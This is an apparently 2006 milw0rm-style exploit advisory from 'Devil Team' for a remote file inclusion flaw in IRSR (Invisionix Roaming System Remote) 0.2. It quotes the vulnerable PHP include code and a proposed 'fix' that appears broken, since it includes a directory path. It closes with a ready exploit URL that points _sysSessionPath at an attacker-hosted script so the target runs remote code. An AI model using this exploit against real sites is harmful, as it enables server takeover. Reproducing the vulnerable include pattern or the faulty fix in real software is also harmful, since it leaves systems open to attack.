72 lines
No EOL
2.5 KiB
Text
72 lines
No EOL
2.5 KiB
Text
/*
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- IRSR - Invisionix Roaming System Remote <= 0.2 [_sysSessionPath] Remote File Include Vulnerabilities
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- [Script name: IRSR - Invisionix Roaming System Remote v. 0.2
|
|
- [Script site: http://www.invisionix.org or http://sourceforge.net/projects/irsr
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- Find by: Kacper (a.k.a Rahim)
|
|
+
|
|
- Contact: kacper1964@yahoo.pl
|
|
- or
|
|
- http://www.devilteam.yum.pl/
|
|
- and
|
|
- http://www.rahim.webd.pl/
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- Special Greetz: DragonHeart :-)
|
|
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
|
|
+
|
|
- P.S: Pozdrawiam ludzi z United Crew!
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
+
|
|
- Z Dedykacja dla osoby,
|
|
- bez ktorej nie mogl bym zyc...
|
|
- K.C:* J.M (a.k.a Magaja)
|
|
+
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
*/
|
|
/*
|
|
vulnerable code => pageheaderdefault.inc.php line 28-36:
|
|
[code]
|
|
//
|
|
// Perform the session handling preprocessing.
|
|
//
|
|
require_once ($_sysSessionPath); // Include the session handling functions.
|
|
|
|
mysql_connect($_sysDBhost1,$_sysDBuser1Login,$_sysDBuser1LoginPass) or die("Could NOT obtain authentication info after login!
|
|
");
|
|
mysql_select_db($_sysDBname) or die("Was NOT able to obtain authentication info after login!
|
|
");
|
|
$dblink=@mysql_connect($_sysDBhost1,$_sysDBuser1Login,$_sysDBuser1LoginPass);
|
|
$session=updateSession($dblink,$session); // Should the user have access to this page?
|
|
[/code]
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
Fix:
|
|
[code]
|
|
$_sysSessionPath = @dirname(@dirname(@dirname(__FILE__)));
|
|
require_once ($_sysSessionPath); // Include the session handling functions.
|
|
|
|
mysql_connect($_sysDBhost1,$_sysDBuser1Login,$_sysDBuser1LoginPass) or die("Could NOT obtain authentication info after login!");
|
|
mysql_select_db($_sysDBname) or die("Was NOT able to obtain authentication info after login!");
|
|
$dblink=@mysql_connect($_sysDBhost1,$_sysDBuser1Login,$_sysDBuser1LoginPass);
|
|
$session=updateSession($dblink,$session); // Should the user have access to this page?
|
|
[/code]
|
|
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
*/
|
|
#Exploit:
|
|
|
|
http://www.site.com/[IRSR_path]/system/includes/pageheaderdefault.inc.php?_sysSessionPath=[http://www.myevilsite.com/evil_scripts.txt]
|
|
|
|
# milw0rm.com [2006-08-17] |